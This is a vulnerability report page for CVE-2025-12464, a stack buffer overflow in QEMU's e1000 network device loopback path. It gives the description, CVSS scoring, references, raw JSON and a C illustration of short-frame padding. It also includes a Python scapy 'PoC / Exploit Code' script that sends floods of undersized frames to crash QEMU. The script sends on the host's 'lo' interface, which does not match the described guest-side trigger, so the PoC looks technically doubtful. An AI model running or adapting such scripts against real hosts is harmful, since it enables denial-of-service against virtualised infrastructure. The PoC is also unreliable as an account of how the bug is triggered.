Security Vulnerability Report
CVE-2025-12464 CVSS 6.2 MEDIUM

CVE-2025-12464

Published: 2025-10-31 22:15:33
Last Modified: 2026-05-06 16:16:03

Description

A stack-based buffer overflow was found in the QEMU e1000 network device. The code for padding short frames was dropped from individual network devices and moved to the net core code. The issue stems from the device's receive code still being able to process a short frame in loopback mode. This could lead to a buffer overrun in the e1000_receive_iov() function via the loopback code path. A malicious guest user could use this vulnerability to crash the QEMU process on the host, resulting in a denial of service.
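The padding step the description refers to, as an added illustration that is not QEMU's code: a model device receive path that zero-pads any frame shorter than the 60-byte Ethernet minimum before later code handles it, and drops frames that would not fit its buffer. ETH_ZLEN, RX_BUF_MAX, the function names and the constructed 'A'-filled frames are assumptions made for the illustration.

```c
/* Added illustration (not QEMU's code) of the short-frame padding step described
 * above: a model receive path that copies a frame into a fixed-size buffer and
 * pads anything shorter than the Ethernet minimum before it is handled. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_ZLEN   60    /* minimum Ethernet frame length, FCS excluded */
#define RX_BUF_MAX 1518  /* largest frame this receive path accepts */
static uint8_t scratch[RX_BUF_MAX];     /* the device's receive buffer */

/* Copy 'in' into 'out', zero-padding it to ETH_ZLEN if it is shorter.
 * Returns the length now held in 'out', or 0 if the frame must be dropped. */
size_t rx_normalize_frame(const uint8_t *in, size_t len, uint8_t *out, size_t out_cap)
{
    if (out_cap < ETH_ZLEN || len > out_cap || len > RX_BUF_MAX) {
        return 0;                           /* would not fit: drop without copying */
    }
    memcpy(out, in, len);
    if (len < ETH_ZLEN) {
        /* The step the vulnerable loopback path lacked: pad the short frame so
         * later code that assumes a minimum-length frame stays inside 'out'. */
        memset(out + len, 0, ETH_ZLEN - len);
        len = ETH_ZLEN;
    }
    return len;
}

/* Feed a constructed frame of 'len' 'A' bytes (the PoC's pattern) through the path; returns the normalised length. */
size_t normalize_constructed(size_t len)
{
    uint8_t frame[4096];                    /* len > RX_BUF_MAX is rejected before any read */
    memset(frame, 'A', sizeof(frame));
    return rx_normalize_frame(frame, len, scratch, sizeof(scratch));
}

/* 1 if scratch[from, to) holds only zero padding, else 0. */
int scratch_tail_is_zero(size_t from, size_t to)
{
    static const uint8_t zeros[ETH_ZLEN];
    return from <= to && to <= ETH_ZLEN && memcmp(scratch + from, zeros, to - from) == 0;
}

int main(void)
{
    size_t n = normalize_constructed(32);
    printf("32-byte frame -> %zu bytes, padding zeroed: %d\n", n, scratch_tail_is_zero(32, n));
    printf("2000-byte frame -> %zu (0 = dropped)\n", normalize_constructed(2000));
    return 0;
}
```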

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

QEMU e1000 network device < fixed version
For specific versions, refer to the official Red Hat and QEMU security advisories.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12464 PoC - QEMU e1000 Stack Buffer Overflow in Loopback Mode
# This PoC demonstrates sending a crafted short frame to trigger the vulnerability

from scapy.all import Ether, Raw, sendp
import sys


def create_crafted_short_frame():
    """
    Create a crafted short frame that triggers buffer overflow in e1000_receive_iov()
    The frame is intentionally smaller than minimum Ethernet frame size (60 bytes)
    to trigger the padding code path in loopback mode.
    """
    # Create an Ethernet frame with payload smaller than minimum frame size
    # Minimum Ethernet frame is 60 bytes (excluding CRC), but we send much smaller
    short_payload = b'A' * 32  # Intentionally undersized payload

    # Craft the Ethernet frame
    # In loopback mode, this frame will be processed by e1000_receive_iov()
    # without proper padding, potentially causing buffer overflow
    eth_frame = Ether(dst='ff:ff:ff:ff:ff:ff', src='00:11:22:33:44:55') / Raw(short_payload)
    return eth_frame


def send_crafted_packets(interface='lo', count=100):
    """
    Send crafted short frames to trigger the vulnerability

    Args:
        interface: Network interface to send packets on (default: loopback)
        count: Number of packets to send
    """
    print(f"[*] Creating crafted short frames for CVE-2025-12464")
    print(f"[*] Target interface: {interface}")
    print(f"[*] Sending {count} malicious packets...")

    # Create the crafted frame
    frame = create_crafted_short_frame()

    # Display frame info
    print(f"[*] Frame size: {len(frame)} bytes (intentionally undersized)")
    print(f"[*] Payload size: {len(frame.payload)} bytes")

    # Send the crafted packets
    # In a vulnerable QEMU setup with e1000 device in loopback mode,
    # this should trigger the buffer overflow in e1000_receive_iov()
    try:
        sendp(frame, iface=interface, count=count, verbose=0)
        print(f"[+] Sent {count} crafted packets successfully")
        print("[+] If target QEMU is vulnerable, it should crash with stack buffer overflow")
    except Exception as e:
        print(f"[-] Error sending packets: {e}")
        return False
    return True


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2025-12464 QEMU e1000 Buffer Overflow PoC")
    print("Target: QEMU e1000 network device in loopback mode")
    print("Effect: Denial of Service (QEMU process crash)")
    print("=" * 60)

    # Allow command line interface specification
    interface = sys.argv[1] if len(sys.argv) > 1 else 'lo'
    count = int(sys.argv[2]) if len(sys.argv) > 2 else 100
    send_crafted_packets(interface=interface, count=count)

References

https://access.redhat.com/security/cve/CVE-2025-12464
https://bugzilla.redhat.com/show_bug.cgi?id=2408845
https://gitlab.com/qemu-project/qemu/-/issues/3043

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12464",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T22:15:32.977",
    "lastModified": "2026-05-06T16:16:02.740",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stack-based buffer overflow was found in the QEMU e1000 network device. The code for padding short frames was dropped from individual network devices and moved to the net core code. The issue stems from the device's receive code still being able to process a short frame in loopback mode. This could lead to a buffer overrun in the e1000_receive_iov() function via the loopback code path. A malicious guest user could use this vulnerability to crash the QEMU process on the host, resulting in a denial of service."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-121"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/security/cve/CVE-2025-12464",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408845",
        "source": "[email protected]"
      },
      {
        "url": "https://gitlab.com/qemu-project/qemu/-/issues/3043",
        "source": "[email protected]"
      }
    ]
  }
}